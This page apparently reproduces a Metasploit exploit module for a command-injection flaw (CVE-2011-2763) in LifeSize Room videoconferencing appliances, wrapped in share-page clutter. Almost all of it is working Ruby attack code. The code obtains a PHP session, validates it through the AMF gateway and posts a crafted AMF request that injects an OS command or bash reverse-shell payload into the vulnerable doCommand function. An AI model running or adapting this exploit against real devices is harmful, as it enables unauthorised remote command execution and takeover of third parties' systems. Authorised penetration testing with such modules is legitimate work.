扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 |
require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'LifeSize Room Command Injection', 'Description'=> %q{ This module exploits a vulnerable resource in LifeSize Roomversions 3.5.3 and 4.7.18 to inject OS commmands.LifeSize Room is an appliance and thus the environment is limited resulting in a small set of payload options. }, 'Author' => [ 'Spencer McIntyre', # Special Thanks To Chris Murrey 'SecureState R&D Team' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 6 $', 'References' => [ [ 'CVE', '2011-2763' ], ], 'Privileged' => false, 'Payload'=> { 'DisableNops' => true, 'Space' => 65535, # limited by the two byte size in the AMF encoding 'Compat'=> { 'PayloadType' => 'cmd cmd_bash', 'RequiredCmd' => 'generic bash-tcp', } }, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Targets'=> [ [ 'Automatic', { } ] ], 'DisclosureDate' => 'July 13 2011', 'DefaultTarget'=> 0)) register_advanced_options( [ OptString.new('UserAgent', [true, 'The User-Agent header to use for all requests', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.17) Gecko/20110428 Fedora/3.6.17-1.fc14 Firefox/3.6.17']) ], self.class) end def exploit print_status("Requesting PHP Session...") res = send_request_cgi({ 'encode' => false, 'uri' => "/interface/interface.php?uniqueKey=#{rand_text_numeric(13)}", 'method' => 'GET', }, 10) if not res.headers['set-cookie'] print_error('Could Not Obtain A Session ID') return end sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0] headers = { 'Cookie' => sessionid, 'Content-Type' => 'application/x-amf', } print_status("Validating PHP Session...") res = send_request_cgi({ 'encode' => false, 'uri' => '/gateway.php', 'data' => "\x00\x00\x00\x00\x00\x02\x00\x1bLSRoom_Remoting.amfphpLogin\x00\x02/1\x00\x00\x00\x05\x0a\x00\x00\x00\x00\x00\x17LSRoom_Remoting.getHost\x00\x02\x2f\x32\x00\x00\x00\x05\x0a\x00\x00\x00\x00", 'method' => 'POST', 'headers' => headers, }) if not res print_error('Could Not Validate The Session ID') return end print_status("Sending Malicious POST Request...") # This is the amf data for the request to the vulnerable function LSRoom_Remoting.doCommand amf_data = "\x00\x00\x00\x00\x00\x01\x00\x19LSRoom_Remoting.doCommand\x00\x02\x2f\x37\xff\xff\xff\xff\x0a\x00\x00\x00\x02\x02#{[payload.encoded.length].pack('n')}#{payload.encoded}\x02\x00\x0dupgradeStatus" res = send_request_cgi({ 'encode' => false, 'uri' => '/gateway.php?' << sessionid, 'data' => amf_data, 'method' => 'POST', 'headers' => headers }, 10) end end |
体验盒子
